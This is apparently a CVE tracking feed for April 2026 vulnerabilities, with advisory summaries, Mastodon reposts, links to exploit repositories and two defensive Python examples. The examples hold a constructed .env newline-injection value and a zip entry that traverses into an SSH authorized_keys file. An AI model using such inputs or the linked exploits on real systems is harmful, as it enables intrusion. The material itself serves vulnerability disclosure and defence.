🔴 CVE-2026-2942 - Critical (9.8)

The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthent...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25776
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-08T21:26:35.910000

1 post

Movable Type provided by Six Apart Ltd. contains a code injection vulnerability which may allow an attacker to execute arbitrary Perl script.

thehackerwire@mastodon.social at 2026-04-09T09:00:12.000Z ##

🔴 CVE-2026-25776 - Critical (9.8)

Movable Type provided by Six Apart Ltd. contains a code injection vulnerability which may allow an attacker to execute arbitrary Perl script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5208
(8.2 HIGH)

EPSS: 0.05%

updated 2026-04-08T21:26:13.410000

1 post

Command injection in alerts in CoolerControl/coolercontrold <4.0.0 allows authenticated attackers to execute arbitrary code as root via injected bash commands in alert names

thehackerwire@mastodon.social at 2026-04-09T08:00:21.000Z ##

🟠 CVE-2026-5208 - High (8.2)

Command injection in alerts in CoolerControl/coolercontrold <4.0.0 allows authenticated attackers to execute arbitrary code as root via injected bash commands in alert names

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39394
(8.1 HIGH)

EPSS: 0.02%

updated 2026-04-08T21:26:13.410000

1 post

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Install::index() controller reads the host POST parameter without any validation and passes it directly into updateEnvSettings(), which writes it into the .env file via preg_replace(). Because newline characters in the value are not st
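The flaw above is a line-oriented file being edited with a regex replace: because the value is inserted verbatim, a newline inside it ends the intended `key = value` line and starts a new, attacker-chosen one. Added example, not CI4MS code and written in Python rather than PHP; the .env contents, key names and helper names are assumptions. It reproduces the injection with a small dotenv reader and shows the two controls that close it: validate the host before use, and refuse control characters and quotes in any value written to the file.

```python
"""Newline injection into a generated .env file, and its fix.

Added example; not CI4MS code. The file text, key names and helpers are
assumptions. The vulnerable pattern (regex replace of a 'key = value'
line with an unvalidated value) follows the advisory's description.
"""
import re

# Constructed .env as an installer might leave it
SAMPLE_ENV = """CI_ENVIRONMENT = production
app.baseURL = 'http://localhost/'
database.default.password = 's3cret'
"""

_KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*")
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOST_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*(?::\d{{1,5}})?")


def _substitute(env_text: str, key: str, value: str) -> str:
    """Replace the whole 'key = ...' line; a lambda keeps backslashes literal."""
    pattern = re.compile(r"^" + re.escape(key) + r"\s*=.*$", re.MULTILINE)
    return pattern.sub(lambda _m: f"{key} = '{value}'", env_text)


def update_env_naive(env_text: str, key: str, value: str) -> str:
    """Vulnerable pattern: the value goes into the file exactly as received."""
    return _substitute(env_text, key, value)


def update_env_safe(env_text: str, key: str, value: str) -> str:
    """Hardened writer: key must be an identifier, value must be one printable line."""
    if not _KEY_RE.fullmatch(key):
        raise ValueError(f"invalid .env key: {key!r}")
    if not value.isprintable() or "'" in value:     # isprintable() is False for \n, \r, \0, ...
        raise ValueError("control character or quote in .env value")
    return _substitute(env_text, key, value)


def validate_host(host: str) -> str:
    """Accept only hostname[:port]; anything else (including newlines) is rejected."""
    if len(host) > 253 or not _HOST_RE.fullmatch(host):
        raise ValueError(f"invalid host: {host!r}")
    return host


def parse_env(env_text: str) -> dict:
    """Minimal KEY = 'value' reader; in this reader the last occurrence of a key wins."""
    env = {}
    for line in env_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip("'\"")
    return env


if __name__ == "__main__":
    # Constructed attacker value: closes the quote, then adds its own lines
    payload = "http://evil.example/'\nCI_ENVIRONMENT = development\nx = '"
    print(update_env_naive(SAMPLE_ENV, "app.baseURL", payload))
    print(parse_env(update_env_naive(SAMPLE_ENV, "app.baseURL", payload)))
```

The host check belongs at the controller boundary (before the value is used to build app.baseURL), and the writer check belongs in the function that touches the file, so that a second caller added later cannot reintroduce the bug.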

thehackerwire@mastodon.social at 2026-04-09T07:15:23.000Z ##

🟠 CVE-2026-39394 - High (8.1)

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Install::index() controller reads the host POST parameter without any validation a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33756
(7.5 HIGH)

EPSS: 0.08%

updated 2026-04-08T21:26:13.410000

1 post

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit on the number of operations. This allowed an unauthenticated attacker to send many operations in a single HTTP request (bypassing the per query complexity

thehackerwire@mastodon.social at 2026-04-09T07:00:06.000Z ##

🟠 CVE-2026-33756 - High (7.5)

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35401
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-08T21:26:13.410000

1 post

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, a malicious actor can include many GraphQL mutations or queries in a single API call using aliases or chaining multiple mutations, resulting in resource exhaustion. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118.

thehackerwire@mastodon.social at 2026-04-09T05:59:54.000Z ##

🟠 CVE-2026-35401 - High (7.5)

Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, a malicious actor can include many GraphQL mutations or queries in a single API call using aliases or chaining multiple mutations, resulting in resour...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23869
(7.5 HIGH)

EPSS: 0.32%

updated 2026-04-08T21:26:13.410000

1 post

A denial of service vulnerability exists in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack (versions 19.0.0 through 19.0.4, 19.1.0 through 19.1.5, and 19.2.0 through 19.2.4). The vulnerability is triggered by sending specially crafted HTTP requests to Server Function endpoints. The payload of the HTTP reque

2 repos

https://github.com/cybertechajju/CVE-2026-23869-Exploit

https://github.com/yohannslm/CVE-2026-23869

thehackerwire@mastodon.social at 2026-04-09T05:14:48.000Z ##

🟠 CVE-2026-23869 - High (7.5)

A denial of service vulnerability exists in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack (versions 19.0.0 through 19.0.4, 19.1.0 through 19.1.5, and 19....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5436
(8.1 HIGH)

EPSS: 0.18%

updated 2026-04-08T21:26:13.410000

1 post

The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in all versions up to and including 5.1.1. This is due to insufficient validation of the $name parameter (upload field key) passed to the generate_user_file_dirpath() function, which uses WordPress's path_join() — a function that returns absolute paths unchanged, discarding the intended base directory. The attacker-contr

thehackerwire@mastodon.social at 2026-04-09T04:20:03.000Z ##

🟠 CVE-2026-5436 - High (8.1)

The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in all versions up to and including 5.1.1. This is due to insufficient validation of the $name parameter (upload field key) passed to the generate_user_file_dirpath() fu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39888
(9.9 CRITICAL)

EPSS: 0.08%

updated 2026-04-08T21:25:14.927000

1 post

PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted __builtins__ dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (blocked_attrs of python_tools.py) contains only 11 attribute names — a strict subset

thehackerwire@mastodon.social at 2026-04-09T05:00:28.000Z ##

🔴 CVE-2026-39888 - Critical (9.9)

PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted __builtins__ dict and an AST-based b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39393
(8.1 HIGH)

EPSS: 0.01%

updated 2026-04-08T19:15:59

1 post

The install route guard in ci4ms relies solely on a volatile cache check (`cache('settings')`) combined with `.env` file existence to block post-installation access to the setup wizard. When the database is temporarily unreachable during a cache miss (TTL expiry or admin-triggered cache clear), the guard fails open, allowing an unauthenticated attacker to overwrite the `.env` file with

thehackerwire@mastodon.social at 2026-04-09T07:15:14.000Z ##

🟠 CVE-2026-39393 - High (8.1)

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the install route guard in ci4ms relies solely on a volatile cache check (cache('setti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4338
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-08T18:35:58

1 post

The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowing unauthenticated users to access draft, scheduled and pending posts

thehackerwire@mastodon.social at 2026-04-09T09:00:24.000Z ##

🟠 CVE-2026-4338 - High (7.5)

The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to be displayed, allowing unauthenticated users to access draft, scheduled and pending posts

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33466
(8.1 HIGH)

EPSS: 0.28%

updated 2026-04-08T18:34:20

1 post

Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or at
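The Logstash archive issue and the MW WP Form path_join() issue (CVE-2026-5436, above) are the same control missing in two places: a path built from untrusted input is used without checking that it still lies under the intended base directory. Python's os.path.join() behaves exactly as the MW WP Form advisory describes for WordPress path_join(): an absolute second argument discards the base. The following is an added example, not code from MW WP Form, WordPress or Logstash; function names and the constructed archive are assumptions. It shows the join pitfall, a confinement check, and archive extraction that validates every member name before writing anything.

```python
"""Path confinement: join-with-absolute-path and archive extraction.

Added example; not code from MW WP Form, WordPress or Logstash. Function
names and the constructed archive are assumptions. Assumes a POSIX host.
"""
import io
import os
import tempfile
import zipfile


def user_dir_naive(base: str, name: str) -> str:
    """The vulnerable pattern: join and trust the result.

    os.path.join("/var/www/uploads", "/etc/passwd") == "/etc/passwd":
    an absolute second argument replaces the base entirely.
    """
    return os.path.join(base, name)


def confined_path(base: str, name: str) -> str:
    """Return base/name, or raise if the resolved result escapes base."""
    base_real = os.path.realpath(base)
    if not name or os.path.isabs(name) or name in (".", ".."):
        raise ValueError(f"rejected path component: {name!r}")
    candidate = os.path.realpath(os.path.join(base_real, name))   # collapses ../ and symlinks
    try:
        inside = os.path.commonpath([base_real, candidate]) == base_real
    except ValueError:                                             # different drives on Windows
        inside = False
    if not inside or candidate == base_real:
        raise ValueError(f"path escapes base directory: {name!r}")
    return candidate


def safe_extract_zip(archive: zipfile.ZipFile, dest: str) -> list:
    """Extract only after every member's target is confirmed to be under dest.

    Validating all names first means a poisoned archive writes nothing at
    all, rather than its benign entries followed by a failure.
    """
    targets = [(info, confined_path(dest, info.filename)) for info in archive.infolist()]
    written = []
    for info, target in targets:
        if info.is_dir():
            os.makedirs(target, exist_ok=True)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with archive.open(info) as src, open(target, "wb") as dst:
            dst.write(src.read())
        written.append(os.path.relpath(target, os.path.realpath(dest)))
    return written


def build_sample_zip(malicious: bool) -> zipfile.ZipFile:
    """Constructed archive: one legitimate file, optionally one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("plugin/config.yml", "ok: true\n")
        if malicious:
            zf.writestr("../../.ssh/authorized_keys", "ssh-ed25519 AAAA... attacker\n")
    buf.seek(0)
    return zipfile.ZipFile(buf)


def demo() -> dict:
    dest = tempfile.mkdtemp()
    extracted = safe_extract_zip(build_sample_zip(False), dest)
    try:
        safe_extract_zip(build_sample_zip(True), dest)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "naive_join": user_dir_naive("/var/www/uploads", "/etc/passwd"),
        "extracted": extracted,
        "traversal_blocked": blocked,
    }


if __name__ == "__main__":
    print(demo())
```

The same confined_path() check applies to tar members, to upload field keys used as directory names, and to any "base + user string" path; normalising with realpath() before the comparison is what defeats both ../ sequences and symlinks planted earlier.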

thehackerwire@mastodon.social at 2026-04-09T06:38:03.000Z ##

🟠 CVE-2026-33466 - High (8.1)

Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do n...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33461
(7.7 HIGH)

EPSS: 0.06%

updated 2026-04-08T18:34:08

1 post

Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetch

thehackerwire@mastodon.social at 2026-04-09T07:00:28.000Z ##

🟠 CVE-2026-33461 - High (7.7)

Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private k...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4498
(7.7 HIGH)

EPSS: 0.05%

updated 2026-04-08T18:34:08

1 post

Execution with Unnecessary Privileges (CWE-250) in Kibana's Fleet plugin debug route handlers can lead to reading index data beyond the user's direct Elasticsearch RBAC scope via Privilege Abuse (CAPEC-122). This requires an authenticated Kibana user with Fleet sub-feature privileges (such as agents, agent policies, and settings management).

thehackerwire@mastodon.social at 2026-04-09T07:00:18.000Z ##

🟠 CVE-2026-4498 - High (7.7)

Execution with Unnecessary Privileges (CWE-250) in Kibana's Fleet plugin debug route handlers can lead to reading index data beyond the user's direct Elasticsearch RBAC scope via Privilege Abuse (CAPEC-122). This requires an authenticated Kibana user wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27806
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-08T18:03:54

1 post

The Orbit agent's FileVault disk encryption key rotation flow on collects a local user's password via a GUI dialog and interpolates it directly into a Tcl/expect script executed via `exec.Command("expect", "-c", script)`. Because the password is inserted into Tcl brace-quoted `send {%s}`, a password containing `}` terminates the literal and injects arbitrary Tcl commands. Since Orbit r

thehackerwire@mastodon.social at 2026-04-09T06:11:22.000Z ##

🟠 CVE-2026-27806 - High (7.8)

Fleet is open source device management software. Prior to 4.81.1, the Orbit agent's FileVault disk encryption key rotation flow on collects a local user's password via a GUI dialog and interpolates it directly into a Tcl/expect script executed via...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-28261
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-08T15:31:50

1 post

Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contain an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system

thehackerwire@mastodon.social at 2026-04-09T08:00:11.000Z ##

🟠 CVE-2026-28261 - High (7.8)

Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contain an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5301
(7.6 HIGH)

EPSS: 0.02%

updated 2026-04-08T15:31:50

1 posts

Stored XSS in log viewer in CoolerControl/coolercontrol-ui <4.0.0 allows unauthenticated attackers to take over the service via malicious JavaScript in poisoned log entries

thehackerwire@mastodon.social at 2026-04-09T07:15:33.000Z ##

🟠 CVE-2026-5301 - High (7.6)

Stored XSS in log viewer in CoolerControl/coolercontrol-ui <4.0.0 allows unauthenticated attackers to take over the service via malicious JavaScript in poisoned log entries

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3396
(7.5 HIGH)

EPSS: 0.08%

updated 2026-04-08T12:31:36

1 posts

WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queri

thehackerwire@mastodon.social at 2026-04-09T09:00:02.000Z ##

🟠 CVE-2026-3396 - High (7.5)

WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficie...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3243
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-08T12:31:36

1 posts

The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right

thehackerwire@mastodon.social at 2026-04-09T08:00:34.000Z ##

🟠 CVE-2026-3243 - High (8.8)

The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3535
(9.8 CRITICAL)

EPSS: 0.28%

updated 2026-04-08T09:31:42

1 posts

The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via a `wp_ajax_nopriv_` hook, requiring no authentication. It fetches a user-supplied URL as a CSS file, extracts URLs from its content, and downloads those

thehackerwire@mastodon.social at 2026-04-09T09:08:39.000Z ##

🔴 CVE-2026-3535 - Critical (9.8)

The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `DSGVOGWPdownloadGoogleFonts()` function in all versions up to, and including, 1.1. The function is exposed via ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 5.60%

updated 2026-04-07T15:30:49

1 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

6 repos

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/dinosn/CVE-2026-34197

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

CVE-2026-35616
(9.8 CRITICAL)

EPSS: 25.25%

updated 2026-04-06T18:12:57.863000

1 posts

An improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

Nuclei template

5 repos

https://github.com/fevar54/forticlient_ems_cve_2026_35616_poc.py

https://github.com/z3r0h3ro/CVE-2026-35616-poc

https://github.com/fevar54/CVE-2026-35616-detector.py

https://github.com/0xBlackash/CVE-2026-35616

https://github.com/BishopFox/CVE-2026-35616-check

PC_Fluesterer@social.tchncs.de at 2026-04-11T10:47:43.000Z ##

Another emergency update at Fortinet

Something completely new for a change - oh no, unfortunately it is not new, but almost normal. Fortinet, the US manufacturer of network-perimeter devices, once again had to publish an emergency update. The security hole it patches, CVE-2026-35616, has already been exploited in attacks since at least the end of March (zero-day exploit). That is already the second zero-day within a few weeks. Back in March, CVE-2026-21643 had to be patched. To repeat: anyone who wants to protect their intranet against the wild, wild Internet has to turn to FOSS.

pc-fluesterer.info/wordpress/2

#Allgemein #Empfehlung #Hintergrund #Warnung #0day #closedsource #cybercrime #exploits #hersteller #sicherheit #UnplugTrump #usa

##

CVE-2026-34040
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-03T16:51:28.670000

1 posts

Moby is an open source container framework. Prior to version 29.3.1, a security vulnerability has been detected that allows attackers to bypass authorization plugins (AuthZ). This issue has been patched in version 29.3.1.

CVE-2026-34504
(8.3 HIGH)

EPSS: 0.05%

updated 2026-04-02T12:20:31.950000

2 posts

OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.

vitobotta@mastodon.social at 2026-04-10T18:37:59.000Z ##

From over a week ago but anyway, CVE-2026-34504 in OpenClaw's image generation pipeline is a reminder that AI agent frameworks inherit all the classic web vulnerabilities plus their own unique attack surface.

An SSRF in the Fal provider means a malicious relay can have the agent fetch internal URLs and leak metadata through the generated output.

I switched from OpenClaw to Hermes Agent a couple of weeks ago, and I need to explore in detail how Hermes handles this stuff.

##

CVE-2026-21643
(9.8 CRITICAL)

EPSS: 13.70%

updated 2026-03-30T13:16:22.063000

1 posts

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiClientEMS 7.4.4 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

Nuclei template

2 repos

https://github.com/0xBlackash/CVE-2026-21643

https://github.com/alirezac0/CVE-2026-21643

PC_Fluesterer@social.tchncs.de at 2026-04-11T10:47:43.000Z ##

Another emergency update at Fortinet

Something completely new for a change - oh no, unfortunately it is not new, but almost normal. Fortinet, the US manufacturer of network-perimeter devices, once again had to publish an emergency update. The security hole it patches, CVE-2026-35616, has already been exploited in attacks since at least the end of March (zero-day exploit). That is already the second zero-day within a few weeks. Back in March, CVE-2026-21643 had to be patched. To repeat: anyone who wants to protect their intranet against the wild, wild Internet has to turn to FOSS.

pc-fluesterer.info/wordpress/2

#Allgemein #Empfehlung #Hintergrund #Warnung #0day #closedsource #cybercrime #exploits #hersteller #sicherheit #UnplugTrump #usa

##

CVE-2026-27654
(8.2 HIGH)

EPSS: 0.03%

updated 2026-03-24T15:30:36

2 posts

NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_dav_module module that might allow an attacker to trigger a buffer overflow to the NGINX worker process; this vulnerability may result in termination of the NGINX worker process or modification of source or destination file names outside the document root. This issue affects NGINX Open Source and NGINX Plus when the configuratio

1 repos

https://github.com/JohannesLks/CVE-2026-27654

CVE-2026-32011
(7.5 HIGH)

EPSS: 0.06%

updated 2026-03-20T21:13:05

1 posts

## Impact OpenClaw webhook handlers for BlueBubbles and Google Chat accepted and parsed request bodies before authentication and signature checks on vulnerable releases. This allowed unauthenticated clients to hold parser work open with slow/oversized request bodies and degrade availability (slow-request DoS). ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected releases: `<=

EUVD_Bot@mastodon.social at 2026-04-10T17:03:11.000Z ##

🚨 EUVD-2026-21476

📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-10

📝 OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-32011 where the Feishu webhook handler accepts request bodies with permissive limits of 1MB and 30-second timeout before signature verification. An unauthenticated attacker can exh...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2026-3497
(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-03-18T21:34:00

1 posts

Vulnerability in the OpenSSH GSSAPI delta included in various Linux distributions. This vulnerability affects the GSSAPI patches added by various Linux distributions and does not affect the OpenSSH upstream project itself. The usage of sshpkt_disconnect() on an error, which does not terminate the process, allows an attacker to send an unexpected GSSAPI message type during the GSSAPI key exchange t

linux@activitypub.awakari.com at 2026-04-09T20:34:10.000Z ##

Debian OpenSSH Critical DSA-6204-1 CVE-2026-3497 Remote DoS Execution

Jeremy Brown discovered a flaw in the GSSAPI Key Exchange patch applied in Debian to OpenSSH, an implementation of the SSH prot...

#Debian #Linux #Distribution #- #Security #Advisories

##

CVE-2026-23060
(5.5 MEDIUM)

EPSS: 0.01%

updated 2026-03-13T21:32:48

1 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than the minimum expected length, crypto_authenc_esn_decrypt() can advance past the end of the destination scatterlist and trigger a NULL pointer dereference in scatterwalk_map_and_co

linux@activitypub.awakari.com at 2026-04-08T21:07:12.000Z ##

Ubuntu 25.10 Kernel Critical Flaws USN-8149-2 CVE-2026-23060 DoS

Several security issues were fixed in the Linux kernel.

#Ubuntu #Linux #Distribution #- #Security #Advisories

##

CVE-2026-20127
(10.0 CRITICAL)

EPSS: 39.66%

updated 2026-02-25T18:31:45

2 posts

A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not

6 repos

https://github.com/abrahamsurf/sdwan-scanner-CVE-2026-20127

https://github.com/sfewer-r7/CVE-2026-20127

https://github.com/BugFor-Pings/CVE-2026-20127_EXP

https://github.com/yonathanpy/CVE-2026-20127-Cisco-SD-WAN-Preauth-RCE

https://github.com/zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE

https://github.com/randeepajayasekara/CVE-2026-20127

metasploit at 2026-04-10T21:23:33.820Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

metasploit@infosec.exchange at 2026-04-10T21:23:33.000Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

CVE-2026-27486
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-23T22:28:51

1 posts

## Summary OpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: `< 2026.2.14` (including the latest published versi

EUVD_Bot@mastodon.social at 2026-04-10T17:03:10.000Z ##

🚨 EUVD-2026-21480

📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-10

📝 OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-27486 where the !stop chat command uses an unpatched killProcessTree function from shell-utils.ts that sends SIGKILL immediately without graceful SIGTERM shutdown. Attackers can tr...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 71.80%

updated 2026-01-30T00:31:29

1 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

2 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

https://github.com/YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

secdb@infosec.exchange at 2026-04-08T20:00:14.000Z ##

